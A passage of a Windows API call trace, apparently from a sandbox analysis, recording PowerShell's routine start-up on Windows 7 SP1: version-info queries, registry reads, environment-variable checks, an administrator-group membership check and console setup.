	[0925.373] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1cdd50 | out: lpdwHandle=0x1cdd50) returned 0x94c
	[0925.374] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e62fa8 | out: lpData=0x2e62fa8) returned 1
	[0925.375] VerQueryValueW (in: pBlock=0x2e62fa8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdcc8, puLen=0x1cdcc0 | out: lplpBuffer=0x1cdcc8*=0x2e63044, puLen=0x1cdcc0) returned 1
	[0925.375] VerQueryValueW (in: pBlock=0x2e62fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1cdc38, puLen=0x1cdc30 | out: lplpBuffer=0x1cdc38*=0x2e63120, puLen=0x1cdc30) returned 1
	[0925.375] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0925.375] CoTaskMemAlloc (cb=0x2e) returned 0x37d5a0
	[0925.375] lstrcpyW (in: lpString1=0x37d5a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0925.376] CoTaskMemFree (pv=0x37d5a0) 
	[0925.376] VerQueryValueW (in: pBlock=0x2e62fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1cdc38, puLen=0x1cdc30 | out: lplpBuffer=0x1cdc38*=0x2e63174, puLen=0x1cdc30) returned 1
	[0925.376] lstrlenW (lpString="System.Management.Automation") returned 28
	[0925.376] CoTaskMemAlloc (cb=0x3c) returned 0x2f8fd0
	[0925.376] lstrcpyW (in: lpString1=0x2f8fd0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0925.376] CoTaskMemFree (pv=0x2f8fd0) 
	[0925.376] VerQueryValueW (in: pBlock=0x2e62fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1cdc38, puLen=0x1cdc30 | out: lplpBuffer=0x1cdc38*=0x2e631d0, puLen=0x1cdc30) returned 1
	[0925.376] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0925.376] CoTaskMemAlloc (cb=0x20) returned 0x37e340
	[0925.376] lstrcpyW (in: lpString1=0x37e340, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0925.376] CoTaskMemFree (pv=0x37e340) 
	[0925.376] VerQueryValueW (in: pBlock=0x2e62fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1cdc38, puLen=0x1cdc30 | out: lplpBuffer=0x1cdc38*=0x2e63210, puLen=0x1cdc30) returned 1
	[0925.376] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0925.376] CoTaskMemAlloc (cb=0x44) returned 0x2f8fd0
	[0925.376] lstrcpyW (in: lpString1=0x2f8fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0925.377] CoTaskMemFree (pv=0x2f8fd0) 
	[0925.377] VerQueryValueW (in: pBlock=0x2e62fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1cdc38, puLen=0x1cdc30 | out: lplpBuffer=0x1cdc38*=0x2e63278, puLen=0x1cdc30) returned 1
	[0925.377] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0925.377] CoTaskMemAlloc (cb=0x76) returned 0x3213e0
	[0925.377] lstrcpyW (in: lpString1=0x3213e0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0925.378] CoTaskMemFree (pv=0x3213e0) 
	[0925.378] VerQueryValueW (in: pBlock=0x2e62fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1cdc38, puLen=0x1cdc30 | out: lplpBuffer=0x1cdc38*=0x2e63314, puLen=0x1cdc30) returned 1
	[0925.378] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0925.378] CoTaskMemAlloc (cb=0x44) returned 0x2f8fd0
	[0925.378] lstrcpyW (in: lpString1=0x2f8fd0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0925.378] CoTaskMemFree (pv=0x2f8fd0) 
	[0925.378] VerQueryValueW (in: pBlock=0x2e62fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1cdc38, puLen=0x1cdc30 | out: lplpBuffer=0x1cdc38*=0x2e63378, puLen=0x1cdc30) returned 1
	[0925.378] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0925.378] CoTaskMemAlloc (cb=0x58) returned 0x348c60
	[0925.378] lstrcpyW (in: lpString1=0x348c60, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0925.378] CoTaskMemFree (pv=0x348c60) 
	[0925.378] VerQueryValueW (in: pBlock=0x2e62fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1cdc38, puLen=0x1cdc30 | out: lplpBuffer=0x1cdc38*=0x2e633f4, puLen=0x1cdc30) returned 1
	[0925.378] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0925.378] CoTaskMemAlloc (cb=0x20) returned 0x37e340
	[0925.378] lstrcpyW (in: lpString1=0x37e340, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0925.379] CoTaskMemFree (pv=0x37e340) 
	[0925.379] VerQueryValueW (in: pBlock=0x2e62fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1cdc38, puLen=0x1cdc30 | out: lplpBuffer=0x1cdc38*=0x2e6309c, puLen=0x1cdc30) returned 1
	[0925.379] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0925.379] CoTaskMemAlloc (cb=0x66) returned 0x37c090
	[0925.379] lstrcpyW (in: lpString1=0x37c090, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0925.379] CoTaskMemFree (pv=0x37c090) 
	[0925.379] VerQueryValueW (in: pBlock=0x2e62fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1cdc38, puLen=0x1cdc30 | out: lplpBuffer=0x1cdc38*=0x0, puLen=0x1cdc30) returned 0
	[0925.379] VerQueryValueW (in: pBlock=0x2e62fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1cdc38, puLen=0x1cdc30 | out: lplpBuffer=0x1cdc38*=0x0, puLen=0x1cdc30) returned 0
	[0925.379] VerQueryValueW (in: pBlock=0x2e62fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1cdc38, puLen=0x1cdc30 | out: lplpBuffer=0x1cdc38*=0x0, puLen=0x1cdc30) returned 0
	[0925.379] VerQueryValueW (in: pBlock=0x2e62fa8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1cdc08, puLen=0x1cdc00 | out: lplpBuffer=0x1cdc08*=0x2e63044, puLen=0x1cdc00) returned 1
	[0925.379] CoTaskMemAlloc (cb=0x204) returned 0x3275b0
	[0925.379] VerLanguageNameW (in: wLang=0x0, szLang=0x3275b0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0925.379] CoTaskMemFree (pv=0x3275b0) 
	[0925.379] VerQueryValueW (in: pBlock=0x2e62fa8, lpSubBlock="\\", lplpBuffer=0x1cdc58, puLen=0x1cdc50 | out: lplpBuffer=0x1cdc58*=0x2e62fd0, puLen=0x1cdc50) returned 1
	[0925.381] CoTaskMemAlloc (cb=0x104) returned 0x376570
	[0925.381] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x376570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0925.381] CoTaskMemFree (pv=0x376570) 
	[0925.382] CoTaskMemAlloc (cb=0x104) returned 0x376570
	[0925.383] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x376570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0925.383] CoTaskMemFree (pv=0x376570) 
	[0925.394] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdb28 | out: phkResult=0x1cdb28*=0x2ec) returned 0x0
	[0925.395] RegOpenKeyExW (in: hKey=0x2ec, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdb18 | out: phkResult=0x1cdb18*=0x2f0) returned 0x0
	[0925.395] RegOpenKeyExW (in: hKey=0x2f0, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdba8 | out: phkResult=0x1cdba8*=0x2f4) returned 0x0
	[0925.398] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdaec, lpData=0x0, lpcbData=0x1cdae8*=0x0 | out: lpType=0x1cdaec*=0x1, lpData=0x0, lpcbData=0x1cdae8*=0x56) returned 0x0
	[0925.400] CoTaskMemAlloc (cb=0x5a) returned 0x37c020
	[0925.400] RegQueryValueExW (in: hKey=0x2f4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cdabc, lpData=0x37c020, lpcbData=0x1cdab8*=0x56 | out: lpType=0x1cdabc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cdab8*=0x56) returned 0x0
	[0925.400] CoTaskMemFree (pv=0x37c020) 
	[0925.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0925.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0926.448] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cd640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0926.466] CoTaskMemAlloc (cb=0x104) returned 0x376570
	[0926.466] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x376570, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0926.466] CoTaskMemFree (pv=0x376570) 
	[0933.198] CoTaskMemAlloc (cb=0x104) returned 0x376680
	[0933.198] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x376680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0933.198] CoTaskMemFree (pv=0x376680) 
	[0933.199] CoTaskMemAlloc (cb=0x104) returned 0x376680
	[0933.199] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x376680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0933.199] CoTaskMemFree (pv=0x376680) 
	[0934.263] CoTaskMemAlloc (cb=0x104) returned 0x376680
	[0934.263] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x376680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0934.263] CoTaskMemFree (pv=0x376680) 
	[0934.265] CoTaskMemAlloc (cb=0x104) returned 0x376680
	[0934.265] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x376680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0934.265] CoTaskMemFree (pv=0x376680) 
	[0934.265] CoTaskMemAlloc (cb=0x104) returned 0x376680
	[0934.265] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x376680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0934.265] CoTaskMemFree (pv=0x376680) 
	[0935.247] CoTaskMemAlloc (cb=0x104) returned 0x376680
	[0935.247] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x376680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0935.247] CoTaskMemFree (pv=0x376680) 
	[0935.249] CoTaskMemAlloc (cb=0x104) returned 0x376680
	[0935.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x376680, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0935.250] CoTaskMemFree (pv=0x376680) 
	[0938.515] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0938.515] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0938.516] CoTaskMemFree (pv=0x3768a0) 
	[0938.516] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0938.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0938.517] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0938.713] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x1cd800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0938.713] SetErrorMode (uMode=0x1) returned 0x1
	[0938.713] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x1cda80 | out: lpFileInformation=0x1cda80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0938.713] SetErrorMode (uMode=0x1) returned 0x1
	[0965.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.745] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0965.745] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.745] CoTaskMemFree (pv=0x3768a0) 
	[0965.748] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0965.748] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.748] CoTaskMemFree (pv=0x3768a0) 
	[0965.748] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0965.748] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.748] CoTaskMemFree (pv=0x3768a0) 
	[0965.751] CoCreateGuid (in: pguid=0x1cde48 | out: pguid=0x1cde48*(Data1=0x3f7ab3f5, Data2=0x62d2, Data3=0x4a5b, Data4=([0]=0x97, [1]=0xf9, [2]=0x32, [3]=0x9a, [4]=0xe6, [5]=0xcf, [6]=0xb2, [7]=0x35))) returned 0x0
	[0965.755] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0965.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.755] CoTaskMemFree (pv=0x3768a0) 
	[0966.064] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0966.064] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.064] CoTaskMemFree (pv=0x3768a0) 
	[0966.067] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0966.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.067] CoTaskMemFree (pv=0x3768a0) 
	[0966.089] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0966.091] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x1cdaf0 | out: lpConsoleScreenBufferInfo=0x1cdaf0) returned 1
	[0966.110] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0966.301] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x1cdaf0 | out: lpConsoleScreenBufferInfo=0x1cdaf0) returned 1
	[0966.302] GetVersionExW (in: lpVersionInformation=0x1cda80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1cda80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0966.304] GetCurrentProcess () returned 0xffffffffffffffff
	[0966.305] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1cdb18 | out: TokenHandle=0x1cdb18*=0x30c) returned 1
	[0966.307] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cda38 | out: TokenInformation=0x0, ReturnLength=0x1cda38) returned 0
	[0966.308] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x32fc70
	[0966.308] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x32fc70, TokenInformationLength=0x4, ReturnLength=0x1cda38 | out: TokenInformation=0x32fc70, ReturnLength=0x1cda38) returned 1
	[0966.309] DuplicateTokenEx (in: hExistingToken=0x30c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x1cdb98 | out: phNewToken=0x1cdb98*=0x2cc) returned 1
	[0966.309] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1cda38 | out: TokenInformation=0x0, ReturnLength=0x1cda38) returned 0
	[0966.309] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x32fca0
	[0966.309] GetTokenInformation (in: TokenHandle=0x30c, TokenInformationClass=0x8, TokenInformation=0x32fca0, TokenInformationLength=0x4, ReturnLength=0x1cda38 | out: TokenInformation=0x32fca0, ReturnLength=0x1cda38) returned 1
	[0966.310] CheckTokenMembership (in: TokenHandle=0x2cc, SidToCheck=0x2f3dd50*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x1cdba8 | out: IsMember=0x1cdba8) returned 1
	[0966.310] CloseHandle (hObject=0x2cc) returned 1
	[0966.321] CoTaskMemAlloc (cb=0x804) returned 0x1b802500
	[0966.321] GetConsoleTitleW (in: lpConsoleTitle=0x1b802500, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0966.322] CoTaskMemFree (pv=0x1b802500) 
	[0966.338] CoTaskMemAlloc (cb=0x804) returned 0x1b805600
	[0966.338] GetConsoleTitleW (in: lpConsoleTitle=0x1b805600, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0966.660] CoTaskMemFree (pv=0x1b805600) 
	[0966.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.661] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.665] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0966.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd670, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.669] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cd5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.709] SetConsoleCtrlHandler (HandlerRoutine=0x2b268dc, Add=1) returned 1
	[0966.727] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x310
	[0966.728] CoCreateGuid (in: pguid=0x1cdc90 | out: pguid=0x1cdc90*(Data1=0x33eb14a1, Data2=0x968f, Data3=0x413b, Data4=([0]=0xb3, [1]=0xf0, [2]=0x3, [3]=0x62, [4]=0xcd, [5]=0x93, [6]=0xec, [7]=0xae))) returned 0x0
	[0966.729] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0966.729] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.729] CoTaskMemFree (pv=0x3768a0) 
	[0966.733] WinSqmIsOptedIn () returned 0x0
	[0966.733] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0966.733] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.733] CoTaskMemFree (pv=0x3768a0) 
	[0966.734] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
	[0966.734] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3768a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0966.734] CoTaskMemFree (pv=0x3768a0) 
	[0967.552] CoTaskMemAlloc (cb=0x104) returned 0x3768a0
